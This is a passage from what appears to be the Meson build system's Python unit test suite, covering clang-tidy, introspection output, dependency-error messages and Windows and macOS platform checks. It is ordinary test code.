self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
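        # Small helper: every (key, expected type) pair must be present in obj
        # with a value of that type.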
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
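        # buildtype=release also implies new optimization and debug values, so
        # patch all affected entries in the expected data before comparing.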
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
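            # Introspection from source cannot know per-language compiler details,
            # so collapse all sources into a single 'unknown' language group.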
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
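        # Compare only the summary block: find where it starts in the output and
        # take the same number of lines from there.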
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
prog = 'trivialprog'
if is_windows():
prog = '{}.exe'.format(prog)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# If compile worked then we should get a program
self.assertPathExists(os.path.join(self.builddir, prog))
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, prog))
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
        Assert that running meson configure on the specified @contents raises
        an error with a message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
        # Exact set comparison to force people to update this test (and the
        # find_library checks below) whenever the list of ignored libs changes.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
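        # Point the per-language linker environment variable at the requested
        # program and check which linker id meson detects for that compiler.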
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
self._check_ld('optlink', 'c', 'optlink')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
